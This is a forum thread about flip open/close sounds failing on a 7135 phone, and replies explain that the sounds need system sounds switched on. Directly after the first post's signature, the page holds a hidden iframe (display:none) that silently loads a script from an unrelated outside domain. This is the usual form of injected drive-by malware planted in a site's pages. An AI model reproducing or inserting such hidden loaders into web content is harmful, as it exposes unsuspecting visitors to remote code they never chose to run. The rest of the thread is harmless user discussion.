+ Reply to Thread

Flip open/close sounds not working

Has anyone had any difficulty getting the 7135 flip open/close sounds to work? I've tried using MP3s that I converted using the RingerMaker as well as some of the built-in sounds. No matter what I do, I can't get any sounds to play when I open or close the flip. What am I missing?

Thanks.

Andrew<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Flip open/close sounds not working

Originally posted by dreamwave6
    Has anyone had any difficulty getting the 7135 flip open/close sounds to work? I've tried using MP3s that I converted using the RingerMaker as well as some of the built-in sounds. No matter what I do, I can't get any sounds to play when I open or close the flip. What am I missing?

Thanks.

Andrew
    This is one of the little irritating quirks I think I mentioned in a post right after getting the phone. The Flip sounds only work if System sounds are turned on. Go to "prefs_PDA" and on the General page, select System Sounds (low works fine) and the flip will work.

Unfortunatly, every time you select any button on the PDA screen you will hear a little click. May not bother you, but I find it quite distracting.....

Re: Re: Flip open/close sounds not working

Originally posted by alanb
    This is one of the little irritating quirks I think I mentioned in a post right after getting the phone. The Flip sounds only work if System sounds are turned on. Go to "prefs_PDA" and on the General page, select System Sounds (low works fine) and the flip will work.

Unfortunatly, every time you select any button on the PDA screen you will hear a little click. May not bother you, but I find it quite distracting.....
    The first thing I did when I got mine was turn off the system sounds because I can't stand that clicking sound everytime I touch the screen. I can live without the flip sounds.

So there's no way to stop the tap-click sounds without killing the flip-open/closed sounds? Bummer.
    Sorry, but I no longer make 7135 headset adapters.

Originally posted by coolcat
    So there's no way to stop the tap-click sounds without killing the flip-open/closed sounds? Bummer.
    Not that I could find.